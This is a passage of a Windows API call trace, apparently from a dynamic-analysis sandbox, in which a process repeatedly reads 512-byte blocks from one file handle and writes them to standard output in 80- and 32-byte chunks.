lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.165] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.165] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, 
lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.166] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.167] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.168] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.168] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, 
lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.169] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.169] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, 
lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.170] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.170] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 
[0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.171] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.171] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: 
lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.172] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.172] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 
[0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.173] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.173] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 
